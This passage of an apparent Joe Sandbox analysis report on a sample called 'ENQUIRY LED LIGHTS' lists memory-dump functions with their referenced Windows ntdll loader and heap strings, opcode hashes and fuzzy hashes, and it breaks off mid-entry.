                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F50BB6
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F50D60
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F50D74
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 1404860816-0
                                                                                                  • Opcode ID: 570c621b69314ab4cf86c9d2cbb40ee3f66a1759303a0112cac2c2b2b3370376
                                                                                                  • Instruction ID: 067b502fc99ee14f0f54bf37927f2a68d191d5105a30805f465e31fa9143cc51
                                                                                                  • Opcode Fuzzy Hash: 570c621b69314ab4cf86c9d2cbb40ee3f66a1759303a0112cac2c2b2b3370376
                                                                                                  • Instruction Fuzzy Hash: 51424D71900715DFDB21CF24C880BAAB7F5FF48354F1445A9EA99EB241DB70AA84CF60
                                                                                                  Function 02F1A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                  • API String ID: 0-379654539
                                                                                                  • Opcode ID: f9e6a3cc7e9baa18aa9070704d07ea0636d4e35bee65d5308d1adf231df5835a
                                                                                                  • Instruction ID: 856e6e5d0da0364abc80255ab96e82f45973e341283b02f78bcbd24fe89ba9ab
                                                                                                  • Opcode Fuzzy Hash: f9e6a3cc7e9baa18aa9070704d07ea0636d4e35bee65d5308d1adf231df5835a
                                                                                                  • Instruction Fuzzy Hash: 66C19C71609382CFC711CF68C540B6AB7E4FF84798F84496AFA969B350E734CA49CB52
                                                                                                  Function 02F48402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • @, xrefs: 02F48591
                                                                                                  • LdrpInitializeProcess, xrefs: 02F48422
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 02F48421
                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 02F4855E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-1918872054
                                                                                                  • Opcode ID: e1bd045c10bad0adf4d4f85d3803a2e11efde28928bf1ab2bd4ce477bf82f7fd
                                                                                                  • Instruction ID: 096435612c35b96fda6b4d1e15b633a7cee89182a5cf573b438dfccdbd11804b
                                                                                                  • Opcode Fuzzy Hash: e1bd045c10bad0adf4d4f85d3803a2e11efde28928bf1ab2bd4ce477bf82f7fd
                                                                                                  • Instruction Fuzzy Hash: 57917D71548744AFEB21EF20CC40F6BBAE9AF847D4F80492EFB8596150E774D944CB62
                                                                                                  Function 02F4273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 02F821DE
                                                                                                  • .Local, xrefs: 02F428D8
                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 02F822B6
                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 02F821D9, 02F822B1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                  • API String ID: 0-1239276146
                                                                                                  • Opcode ID: 7007447d13d2f1fe8d5e3ae6a501e0898c0f6b2ec52c7a7401c7243e5cb6f670
                                                                                                  • Instruction ID: 2399db3d34625bac985c7c68e75af4179973468838fc23c0634d4f6fd27c08ac
                                                                                                  • Opcode Fuzzy Hash: 7007447d13d2f1fe8d5e3ae6a501e0898c0f6b2ec52c7a7401c7243e5cb6f670
                                                                                                  • Instruction Fuzzy Hash: 87A19131E402299BDB24DF54DC94BA9B7B1BF58394F1541F9EE08A7250DB70AE80CF91
                                                                                                  Function 02F44AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 02F83456
                                                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 02F8342A
                                                                                                  • RtlDeactivateActivationContext, xrefs: 02F83425, 02F83432, 02F83451
                                                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 02F83437
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                  • API String ID: 0-1245972979
                                                                                                  • Opcode ID: 10017459b81e2768e30da6fa49ddb8e20a7ae08dc2a5e105ba2f4d5642a4f6f0
                                                                                                  • Instruction ID: 2d89a875355303201ea7547f20c296b6ee30aafe735d139f6ab4b2e46ecdc2ed
                                                                                                  • Opcode Fuzzy Hash: 10017459b81e2768e30da6fa49ddb8e20a7ae08dc2a5e105ba2f4d5642a4f6f0
                                                                                                  • Instruction Fuzzy Hash: A7613632A407119FD722DF18C981B2AFBE5EF80BD4F18855DEB65AB250DB74E840CB91
                                                                                                  Function 02F164AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 02F7106B
                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 02F710AE
                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 02F70FE5
                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 02F71028
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                  • API String ID: 0-1468400865
                                                                                                  • Opcode ID: 978c32f6d3f00a41606b8da8feb091d1e88548e130bc8ac0149e940c91a8071d
                                                                                                  • Instruction ID: 365ad735da6bd0b3885ccf6c92fd492985b7ddbdbad28f919e8088a947a4f2b0
                                                                                                  • Opcode Fuzzy Hash: 978c32f6d3f00a41606b8da8feb091d1e88548e130bc8ac0149e940c91a8071d
                                                                                                  • Instruction Fuzzy Hash: 43718CB19043449BDB20DF24C884B9B7FAAEF447E4F800569FB498A286D774D588CFD2
                                                                                                  Function 02F3245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 02F7A9A2
                                                                                                  • LdrpDynamicShimModule, xrefs: 02F7A998
                                                                                                  • apphelp.dll, xrefs: 02F32462
                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 02F7A992
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-176724104
                                                                                                  • Opcode ID: 7b32b629ed3810e4fc2855e158f102c625351dca56d9b8c6b2a97c3073ed278b
                                                                                                  • Instruction ID: 20d376a3201a32f49d89f2bc18f7c575cf513c4235497e5db7c07739e67eaa4e
                                                                                                  • Opcode Fuzzy Hash: 7b32b629ed3810e4fc2855e158f102c625351dca56d9b8c6b2a97c3073ed278b
                                                                                                  • Instruction Fuzzy Hash: C4315B32B01201EBEB21AF68DD81F6EB7B6FB84B98F16406AFB0167245C7745851CB40
                                                                                                  Function 02F229A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • HEAP[%wZ]: , xrefs: 02F23255
                                                                                                  • HEAP: , xrefs: 02F23264
                                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 02F2327D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                  • API String ID: 0-617086771
                                                                                                  • Opcode ID: 215a2e75d52515e10c2f59dec5adbaca8c36fc5c15e1b728ae6194b621eb4933
                                                                                                  • Instruction ID: 770c4441214b8f09eff7f0e5ab5c91d4df1f4ceb189403c0af8de6def8a827c9
                                                                                                  • Opcode Fuzzy Hash: 215a2e75d52515e10c2f59dec5adbaca8c36fc5c15e1b728ae6194b621eb4933
                                                                                                  • Instruction Fuzzy Hash: AC92DF71E042689FDB25CF68C8407ADBBF1FF4A344F148099EA49AB391D738A949CF50
                                                                                                  Function 02F20770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-4253913091
                                                                                                  • Opcode ID: 679bed0e9efbd3988ade802d478e90910f71bdc8a232595fab4e5972035ae264
                                                                                                  • Instruction ID: f2ca2e0854977991fb9458aac9fedd72635b25bf5ca4da7ce10083224daa6afb
                                                                                                  • Opcode Fuzzy Hash: 679bed0e9efbd3988ade802d478e90910f71bdc8a232595fab4e5972035ae264
                                                                                                  • Instruction Fuzzy Hash: C6F1AC32B00605DFEB14CF68C894B6AB7B6FB56384F148169EA069B391DB34E945CF90
                                                                                                  Function 02F36962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $@
                                                                                                  • API String ID: 0-1077428164
                                                                                                  • Opcode ID: 23bfb41d6d75ba45e83f9ee0bc47363c43bb578f3172d8d90c73549ad26a8b25
                                                                                                  • Instruction ID: 4e511c8d885e553ebfdd73fa8abe1c0c16129a36084fb29e0322a2df5ecbfc68
                                                                                                  • Opcode Fuzzy Hash: 23bfb41d6d75ba45e83f9ee0bc47363c43bb578f3172d8d90c73549ad26a8b25
                                                                                                  • Instruction Fuzzy Hash: 59C274B2A083419FD726DF24C841BABB7E5BF88794F04892EFA89D7241D734D845CB52
                                                                                                  Function 02F0A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                  • API String ID: 0-2779062949
                                                                                                  • Opcode ID: 2ac2e6a476129beb75d1416910dc5f6426bb80a9a5c943d928f629bd1a20b8d8
                                                                                                  • Instruction ID: 2c379ac82d1703647174f220f4f2b80d576c086c6b14d41efe87470fe7fd6cb8
                                                                                                  • Opcode Fuzzy Hash: 2ac2e6a476129beb75d1416910dc5f6426bb80a9a5c943d928f629bd1a20b8d8
                                                                                                  • Instruction Fuzzy Hash: 8EA16A72D016299BDB31DF64CC8CBAAB7B8EF48754F1001EAEA49A7250D7359E84CF50
                                                                                                  Function 02F30BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • LdrpCheckModule, xrefs: 02F7A117
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 02F7A121
                                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 02F7A10F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-161242083
                                                                                                  • Opcode ID: 36c869438dfbd909a14777dc8895dd0ea29bfc7b9977e221ff77643d0ce29f5d
                                                                                                  • Instruction ID: da448ee937788fef0107e7fa12f773fde0b4313d2e48c2570c8ce8966046de38
                                                                                                  • Opcode Fuzzy Hash: 36c869438dfbd909a14777dc8895dd0ea29bfc7b9977e221ff77643d0ce29f5d
                                                                                                  • Instruction Fuzzy Hash: 8571DD71E002059FDB19EF68CD80BAEB7F5EB48788F15446EDA02AB250EB75A945CF40
                                                                                                  Function 02F20A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-1334570610
                                                                                                  • Opcode ID: 6bccef58f715e4eff57b11ee99f846681c9372c787708d4ba3a705d486dfb8de
                                                                                                  • Instruction ID: 81f79d6716164eb21cdc3b138bd6762d33d7ab929f5693387fec4e3569669672
                                                                                                  • Opcode Fuzzy Hash: 6bccef58f715e4eff57b11ee99f846681c9372c787708d4ba3a705d486dfb8de
                                                                                                  • Instruction Fuzzy Hash: 8E619172A003159FDB28CF24C480B6ABBE2FF45788F54855EEA59CF291DB70E845CB91
                                                                                                  Function 02F4C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 02F882E8
                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 02F882DE
                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 02F882D7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-1783798831
                                                                                                  • Opcode ID: e9d39a091317dd1067f25fb34deac4a0ebcf6f5270ba53253376d9ab35ba7acc
                                                                                                  • Instruction ID: 4d6a13d3ccc13f4cbc05be57d94242d43449a39e7a51a9ee61d90bd734cfd6c5
                                                                                                  • Opcode Fuzzy Hash: e9d39a091317dd1067f25fb34deac4a0ebcf6f5270ba53253376d9ab35ba7acc
                                                                                                  • Instruction Fuzzy Hash: AE41B172646318ABE720FB64DC44F5B7BE9EF447D4F00552AFA4997290EBB4D800CB91
                                                                                                  Function 02FCC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • PreferredUILanguages, xrefs: 02FCC212
                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 02FCC1C5
                                                                                                  • @, xrefs: 02FCC1F1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                  • API String ID: 0-2968386058
                                                                                                  • Opcode ID: e94c4e7b1ecd0f410cb136710c71785b8befdbe46b4fbe72521cd67fccc5fea4
                                                                                                  • Instruction ID: 49f8cf009a92d37652c7d52c54c0eae8de7d38906889111effe7806fcef58191
                                                                                                  • Opcode Fuzzy Hash: e94c4e7b1ecd0f410cb136710c71785b8befdbe46b4fbe72521cd67fccc5fea4
                                                                                                  • Instruction Fuzzy Hash: 2D416372E0021AEBDF11DAD4C991FEEB7B9AB04B84F14416FEB06B7284D7749A44CB50
                                                                                                  Function 02FA4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                  • API String ID: 0-1373925480
                                                                                                  • Opcode ID: 50715888a7831b20a7489a0e385b27a3e196ee34e761afe5ddd54ace79214e39
                                                                                                  • Instruction ID: 8078eed0437a18e0a62c2e02c17a6c926d5f95b7dd6bc2741ecee6b7fa5d9746
                                                                                                  • Opcode Fuzzy Hash: 50715888a7831b20a7489a0e385b27a3e196ee34e761afe5ddd54ace79214e39
                                                                                                  • Instruction Fuzzy Hash: 9441D3B2A006588BEB26DBA4CD54BADB7F5EF453C4F140569DA01FB791D7B48901CB10
                                                                                                  Function 02F94755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • LdrpCheckRedirection, xrefs: 02F9488F
                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 02F94899
                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 02F94888
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                  • API String ID: 0-3154609507
                                                                                                  • Opcode ID: 7986996e2c28e4ec0988846d43bbcf030c6bc5f7d03f73380ffbbe904b5ec7de
                                                                                                  • Instruction ID: 1e4698801ae0746b951ad6ed2876336e0a2652615a239810bdd9fc15108d9535
                                                                                                  • Opcode Fuzzy Hash: 7986996e2c28e4ec0988846d43bbcf030c6bc5f7d03f73380ffbbe904b5ec7de
                                                                                                  • Instruction Fuzzy Hash: 8F41D132B052988FEF21DF58D840E26B7E5EFA9AD4F050659EE4997311D331D802CB92
                                                                                                  Function 02F20BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-2558761708
                                                                                                  • Opcode ID: 0d0a01629d9a02695d7da4287fd704c381e5f48bdd4b797ce99b08d5bee6833f
                                                                                                  • Instruction ID: 9ac129e188d002c4b65517f05f3480d86566206feaf680b5411794723f9517b1
                                                                                                  • Opcode Fuzzy Hash: 0d0a01629d9a02695d7da4287fd704c381e5f48bdd4b797ce99b08d5bee6833f
                                                                                                  • Instruction Fuzzy Hash: 08110632755111DFEB2CDB14C8A4B35B3A6EF51799F54812EEA06DB250EB30D844CB51
                                                                                                  Function 02F920DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 02F92104
                                                                                                  • LdrpInitializationFailure, xrefs: 02F920FA
                                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 02F920F3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-2986994758
                                                                                                  • Opcode ID: 7a4b0e485b66307c262b58f1ffe9079f29a599feed04989b176071c148b05f7e
                                                                                                  • Instruction ID: 4872e99280b58afdd7b4a4aa2226b46209a92086e8bd187c952ebc942f4dbed9
                                                                                                  • Opcode Fuzzy Hash: 7a4b0e485b66307c262b58f1ffe9079f29a599feed04989b176071c148b05f7e
                                                                                                  • Instruction Fuzzy Hash: 21F0C835A81248BBFB24E748CC43F963769EB41B98F104059FF0577281D7B0A950CE91
                                                                                                  Function 02F203E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: #%u
                                                                                                  • API String ID: 48624451-232158463
                                                                                                  • Opcode ID: f40be75fae20c73e6c4135e5f6e60438f050208588c2404e9430d273de516427
                                                                                                  • Instruction ID: a2937f9f5e82654e70e365983b357edcd6095a098015742db608298971275851
                                                                                                  • Opcode Fuzzy Hash: f40be75fae20c73e6c4135e5f6e60438f050208588c2404e9430d273de516427
                                                                                                  • Instruction Fuzzy Hash: C6714C72E0015A9FDB01DFA8C984BAEB7B9FF08784F144069EA05E7251EB34ED45CB60
                                                                                                  Function 02F9CEA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 02F9CFBD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallFilterFunc@8
                                                                                                  • String ID: @
                                                                                                  • API String ID: 4062629308-2766056989
                                                                                                  • Opcode ID: fd4c7d1cb0e22dc3abb10f030b9345f30c32357689ae2dbc619a5e52b9ceb1d0
                                                                                                  • Instruction ID: c9d729c9137a98e0e568b68fac5ccc79c62d9dae4e9b7323fee1d8457fd2230c
                                                                                                  • Opcode Fuzzy Hash: fd4c7d1cb0e22dc3abb10f030b9345f30c32357689ae2dbc619a5e52b9ceb1d0
                                                                                                  • Instruction Fuzzy Hash: C041AD75900228DFEB21EFA5C840A6EBBB9EF49B84F10406AEB15DB264D735D805CB61
                                                                                                  Function 02F1A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • LdrResSearchResource Exit, xrefs: 02F1AA25
                                                                                                  • LdrResSearchResource Enter, xrefs: 02F1AA13
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                  • API String ID: 0-4066393604
                                                                                                  • Opcode ID: 885d0eaf732f9ea01115d249ac8b92c4616843e584d0191d3793a671c3fc4ca6
                                                                                                  • Instruction ID: dab077bae7769cdcf59944e4da2ac453e49b26536e4094c323bf326fbe9099f6
                                                                                                  • Opcode Fuzzy Hash: 885d0eaf732f9ea01115d249ac8b92c4616843e584d0191d3793a671c3fc4ca6
                                                                                                  • Instruction Fuzzy Hash: C0E17072F01258EFEB21CE99C980BEEB7BAAF04394F54406AEB01E7290D7749940DB50
                                                                                                  Function 02FDA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
